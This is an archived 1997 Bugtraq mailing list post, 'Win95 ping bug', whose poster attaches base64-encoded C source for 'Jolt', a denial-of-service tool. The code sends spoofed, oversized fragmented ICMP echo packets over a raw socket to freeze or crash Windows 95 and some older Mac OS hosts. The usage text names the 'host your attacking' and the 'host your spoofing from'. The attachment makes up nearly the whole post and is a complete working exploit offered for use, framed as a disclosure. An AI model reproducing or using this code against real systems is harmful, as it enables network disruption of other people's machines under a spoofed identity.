Bugtraq mailing list archives

Win95 ping bug

From: nomad () APOLLO TOMCO NET (nomad () APOLLO TOMCO NET)
Date: Sun, 29 Jun 1997 16:35:47 -0400


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

--0-698726896-867616547=:3264
Content-Type: TEXT/PLAIN; charset=US-ASCII

  Hi, I originally reported that ping bug to ms quite some time ago, but i
figure i'll throw my source up here just for the heck of it.


--0-698726896-867616547=:3264
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="jolt.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.3.95q.970629163547.3264B () apollo tomco net>
Content-Description:

LyogSm9sdCAxLjAgKGMpIDE5OTcgYnkgSmVmZiB3LiBSb2JlcnNvbg0KICog
UGxlYXNlLCBpZiB5b3UgdXNlIG15IGNvZGUgZ2l2ZSBtZSBjcmVkaXQuICBB
bHNvLCBpZiBpIHdhcyB0aGUgZmlyc3QgdG8NCiAqIGZpbmQgdGhpcyBnbGl0
Y2gsIHBsZWFzZSBnaXZlIG1lIGNyZWRpdC4gIFRoYXRzIGFsbCBpIGFzay4N
CiAqDQogKiBPayBzbyBhbGwgdGhpcyBkb2VzIGlzIGJ1aWxkIGEgcmVhbGx5
IGZyYWdnbWVudGVkIG92ZXIgc2l6ZWQgcGFja2V0DQogKiBhbmQgb25jZSB3
aW45NSBnZXRzIGl0LCBhbmQgcHV0cyBpdCBiYWNrIHRvZ2V0aGVyIGl0IGxv
Y2tzLiAgSSBzZW5kDQogKiBtdWx0aXBsZSBwYWNrZXRzIGJ5IGRlZmF1bHQg
Y2F1c2Ugc29tZSB0aW1lcyBpdCB0YWtlcyBhIGZldyBwYWNrZXRzIHRvDQog
KiB0b3RhbGx5IGZyZWV6ZSB0aGUgaG9zdC4gIE1heWJlIGl0cyBzcGVuZGlu
ZyBwcm9jZXNzb3IgdGltZSB0byBmaWd1cmUNCiAqIG91dCBob3cgdG8gcHV0
IHRoZW0gYmFjayB0b2dldGhlcj8gIEkndmUgaGFkIHJlcG9ydHMgb2YgcGVv
cGxlIGJsdWUNCiAqIHNjcmVlbmluZyBmcm9tIGl0IHRobyBzbyB3ZSdsbCBs
ZXQgTWljcm9zb2Z0J3MgYm95cyBmaWd1cmUgb3V0IGV4YWN0bHkNCiAqIHdo
YXQgdGhpcyBkb2VzIHRvIDk1LiAgQXMgb2Ygbm93IGkgaGF2ZW4ndCB0ZXN0
ZWQgaXQgb24gTlQsIGJ1dCBtYXliZQ0KICogaSB3aWxsIGxhdGVyIDspLiAg
QWxsIG9mIHRoaXMgc291cmNlIHdhc24ndCBvcmlnb25hbGx5IHdyaXR0ZW4g
YnkgbWUNCiAqIEkganVzdCB0b29rIG9uZSBvZiB0aGUgb2xkIHByb2dyYW1z
IHRvIGtpbGwgUE9TSVggYW5kIFNZU1YgYmFzZWQNCiAqIHN5c3RlbXMgYW5k
IHdvcmtlZCBvbiBpdCBhYml0LCB0aGVuIG1hZGUgaXQgc3Bvb2YgPSkuIA0K
ICogVmFsbGFIICAoeWF3YXlAaG90bWFpbC5jb20pDQogKg0KICogIFVwZGF0
ZTogSXQgYXBlYXJzIHRvIHdvcmsgb24gc29tZSBvbGRlciB2ZXJzaW9ucyBv
ZiBtYWMgb3MNCiAqLw0KDQovKiBZYWggdGhpcyBpcyBmb3IgbGludXgsIGJ1
dCBpIGxpa2UgdGhlIEJTRCBpcCBoZWFkZXIgYmV0dGVyIHRoZW4gbGludXgn
cyAqLw0KI2RlZmluZSBfX0JTRF9TT1VSQ0UNCiNpbmNsdWRlIDxzdGRpby5o
Pg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2Nr
ZXQuaD4NCiNpbmNsdWRlIDxuZXRkYi5oPg0KI2luY2x1ZGUgPG5ldGluZXQv
aW4uaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luX3N5c3RtLmg+DQojaW5jbHVk
ZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaXBfaWNtcC5o
Pg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGFycGEvaW5ldC5o
Pg0KDQppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQogICAg
ICAgIGludCBzLGk7DQogICAgICAgIGNoYXIgYnVmWzQwMF07DQogICAgICAg
IHN0cnVjdCBpcCAqaXAgPSAoc3RydWN0IGlwICopYnVmOw0KICAgICAgICBz
dHJ1Y3QgaWNtcGhkciAqaWNtcCA9IChzdHJ1Y3QgaWNtcGhkciAqKShpcCAr
IDEpOw0KICAgICAgICBzdHJ1Y3QgaG9zdGVudCAqaHAsICpocDI7DQogICAg
ICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBkc3Q7DQogICAgICAgIGludCBvZmZz
ZXQ7DQogICAgICAgIGludCBvbiA9IDE7DQoJaW50IG51bSA9IDU7DQoNCiAg
ICAgICAgYnplcm8oYnVmLCBzaXplb2YgYnVmKTsNCg0KICAgICAgICBpZiAo
KHMgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19SQVcsIElQUFJPVE9fUkFXICkp
IDwgMCkgew0KICAgICAgICAgICAgICAgIHBlcnJvcigic29ja2V0Iik7DQog
ICAgICAgICAgICAgICAgZXhpdCgxKTsNCiAgICAgICAgfQ0KICAgICAgICBp
ZiAoc2V0c29ja29wdChzLCBJUFBST1RPX0lQLCBJUF9IRFJJTkNMLCAmb24s
IHNpemVvZihvbikpIDwgMCkgew0KICAgICAgICAgICAgICAgIHBlcnJvcigi
SVBfSERSSU5DTCIpOw0KICAgICAgICAgICAgICAgIGV4aXQoMSk7DQogICAg
ICAgIH0NCiAgICAgICAgaWYgKGFyZ2MgPCAzKSB7DQoJCXByaW50ZigiSm9s
dCB2MS4wIFlldCBBTk9USEVSIHdpbmRvd3M5NShBbmQgbWFjT1MhKSBnbGl0
Y2ggYnkgVmFsbGFIICh5YXdheUBob3RtYWlsLmNvbSlcbiIpOw0KICAgICAg
ICAgICAgICAgIHByaW50ZigiXG51c2FnZTogJXMgPGRzdGFkZHI+IDxzYWRk
cj4gW251bWJlcl1cbiIsYXJndlswXSk7DQoJCXByaW50ZigiXHRkc3RhZGRy
IGlzIHRoZSBob3N0IHlvdXIgYXR0YWNraW5nXG4iKTsNCgkJcHJpbnRmKCJc
dHNhZGRyIGlzIHRoZSBob3N0IHlvdXIgc3Bvb2ZpbmcgZnJvbVxuIik7DQoJ
CXByaW50ZigiXHROdW1iZXIgaXMgdGhlIG51bWJlciBvZiBwYWNrZXRzIHRv
IHNlbmQsIDUgaXMgdGhlIGRlZmF1bHRcbiIpOw0KCQlwcmludGYoIlxuTk9U
RTogIFRoaXMgaXMgYmFzZWQgb24gYSBidWcgdGhhdCB1c2VkIHRvIGFmZmVj
dCBQT1NJWCBjb21wbGllbnQsIGFuZCBTWVNWIFxuXHQgc3lzdGVtcyBzbyBp
dHMgbm90aGluZyBuZXcuLlxuIik7DQoJCXByaW50ZigiXG5HcmVldHMgdG8g
QmlsbCBHYXRlcyEgSG93IGRvIHlhIGxpa2UgdGhpcyBvbmU/IDotKVxuIik7
DQogICAgICAgICAgICAgICAgZXhpdCgxKTsNCiAgICAgICAgfQ0KICAgICAg
ICBpZiAoYXJnYyA9PSA0KSBudW0gPSBhdG9pKGFyZ3ZbM10pOw0KICAgIGZv
ciAoaT0xO2k8PW51bTtpKyspIHsNCg0KICAgICAgICBpZiAoKGhwID0gZ2V0
aG9zdGJ5bmFtZShhcmd2WzFdKSkgPT0gTlVMTCkgew0KICAgICAgICAgICAg
ICAgIGlmICgoaXAtPmlwX2RzdC5zX2FkZHIgPSBpbmV0X2FkZHIoYXJndlsx
XSkpID09IC0xKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBmcHJpbnRm
KHN0ZGVyciwgIiVzOiB1bmtub3duIGhvc3RcbiIsIGFyZ3ZbMV0pOw0KCQkJ
ZXhpdCgxKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgIH0gZWxzZSB7
DQogICAgICAgICAgICAgICAgYmNvcHkoaHAtPmhfYWRkcl9saXN0WzBdLCAm
aXAtPmlwX2RzdC5zX2FkZHIsIGhwLT5oX2xlbmd0aCk7DQogICAgICAgIH0N
Cg0KICAgICAgICBpZiAoKGhwMiA9IGdldGhvc3RieW5hbWUoYXJndlsyXSkp
ID09IE5VTEwpIHsNCiAgICAgICAgICAgICAgICBpZiAoKGlwLT5pcF9zcmMu
c19hZGRyID0gaW5ldF9hZGRyKGFyZ3ZbMl0pKSA9PSAtMSkgew0KICAgICAg
ICAgICAgICAgICAgICAgICAgZnByaW50ZihzdGRlcnIsICIlczogdW5rbm93
biBob3N0XG4iLCBhcmd2WzJdKTsNCiAgICAgICAgICAgICAgICAgICAgICAg
IGV4aXQoMSk7DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2Ug
ew0KICAgICAgICAgICAgICAgIGJjb3B5KGhwMi0+aF9hZGRyX2xpc3RbMF0s
ICZpcC0+aXBfc3JjLnNfYWRkciwgaHAtPmhfbGVuZ3RoKTsNCiAgICAgICAg
fQ0KDQogICAgICAgIHByaW50ZigiU2VuZGluZyB0byAlc1xuIiwgaW5ldF9u
dG9hKGlwLT5pcF9kc3QpKTsNCiAgICAgICAgaXAtPmlwX3YgPSA0Ow0KICAg
ICAgICBpcC0+aXBfaGwgPSBzaXplb2YgKmlwID4+IDI7DQogICAgICAgIGlw
LT5pcF90b3MgPSAwOw0KICAgICAgICBpcC0+aXBfbGVuID0gaHRvbnMoc2l6
ZW9mIGJ1Zik7DQogICAgICAgIGlwLT5pcF9pZCA9IGh0b25zKDQzMjEpOw0K
ICAgICAgICBpcC0+aXBfb2ZmID0gaHRvbnMoMCk7DQogICAgICAgIGlwLT5p
cF90dGwgPSAyNTU7DQogICAgICAgIGlwLT5pcF9wID0gMTsNCiAgICAgICAg
aXAtPmlwX2NzdW0gPSAwOyAgICAgICAgICAgICAgICAgLyoga2VybmVsIGZp
bGxzIGluICovDQoNCiAgICAgICAgZHN0LnNpbl9hZGRyID0gaXAtPmlwX2Rz
dDsNCiAgICAgICAgZHN0LnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KDQogICAg
ICAgIGljbXAtPnR5cGUgPSBJQ01QX0VDSE87DQogICAgICAgIGljbXAtPmNv
ZGUgPSAwOw0KICAgICAgICBpY21wLT5jaGVja3N1bSA9IGh0b25zKH4oSUNN
UF9FQ0hPIDw8IDgpKTsNCiAgICAgICAgZm9yIChvZmZzZXQgPSAwOyBvZmZz
ZXQgPCA2NTUzNjsgb2Zmc2V0ICs9IChzaXplb2YgYnVmIC0gc2l6ZW9mICpp
cCkpIHsNCiAgICAgICAgICAgICAgICBpcC0+aXBfb2ZmID0gaHRvbnMob2Zm
c2V0ID4+IDMpOw0KICAgICAgICAgICAgICAgIGlmIChvZmZzZXQgPCA2NTEy
MCkNCiAgICAgICAgICAgICAgICAgICAgICAgIGlwLT5pcF9vZmYgfD0gaHRv
bnMoMHgyMDAwKTsNCiAgICAgICAgICAgICAgICBlbHNlDQogICAgICAgICAg
ICAgICAgICAgICAgICBpcC0+aXBfbGVuID0gaHRvbnMoNDE4KTsgIC8qIG1h
a2UgdG90YWwgNjU1MzggKi8NCiAgICAgICAgICAgICAgICBpZiAoc2VuZHRv
KHMsIGJ1Ziwgc2l6ZW9mIGJ1ZiwgMCwgKHN0cnVjdCBzb2NrYWRkciAqKSZk
c3QsDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
c2l6ZW9mIGRzdCkgPCAwKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBm
cHJpbnRmKHN0ZGVyciwgIm9mZnNldCAlZDogIiwgb2Zmc2V0KTsNCiAgICAg
ICAgICAgICAgICAgICAgICAgIHBlcnJvcigic2VuZHRvIik7DQogICAgICAg
ICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIGlmIChvZmZzZXQgPT0gMCkg
ew0KICAgICAgICAgICAgICAgICAgICAgICAgaWNtcC0+dHlwZSA9IDA7DQog
ICAgICAgICAgICAgICAgICAgICAgICBpY21wLT5jb2RlID0gMDsNCiAgICAg
ICAgICAgICAgICAgICAgICAgIGljbXAtPmNoZWNrc3VtID0gMDsNCiAgICAg
ICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoJcmV0dXJuIDA7DQp9
DQo=
--0-698726896-867616547=:3264--

Current thread:

Solaris Ping bug (DoS), (continued)
- Solaris Ping bug (DoS) Adam Caldwell (Jun 25)
  - Re: Solaris Ping bug (DoS) Gnuchev Fedor (Jun 26)
  - Re: Solaris Ping bug (DoS) just me. (Jun 26)
  - Re: Solaris Ping bug (DoS) Francesco Messineo (Jun 26)
  - 'sec-fix' for NT 3.51 Aleph One (Jun 26)
  - Problem in dxterm (ULTRIX) Trevor Schroeder (Jun 26)
  - Re: Solaris Ping bug (DoS) Philip Kizer (Jun 26)
    - Solaris Ping bug(inetsvc) Renteria Tabares J. (Jun 27)
    - Announce: ypcat for Win NT/95 Aaron Spangler (Jun 27)
  - Re: Solaris Ping bug (DoS) Geoff Mulligan (Jun 27)
    - Win95 ping bug nomad () APOLLO TOMCO NET (Jun 29)
    - Re: Solaris Ping bug (DoS) Jon Edwards (Jun 30)
  - Alert: Routing and RAS Filtering issue Aleph One (Jun 27)
  - Solaris Ping Bug and other [bc] oddities Aleph One (Jun 23)
- Re: [ADVISORY] 4.4BSD Securelevels Howie Kaye (Jun 26)
  - Re: [ADVISORY] 4.4BSD Securelevels Thomas H. Ptacek (Jun 26)
  - SUMMARY: Solaris Ping bug (DoS) Gnuchev Fedor (Jun 27)
  - Security hole affects many cvs pserver installations Aleph One (Jun 27)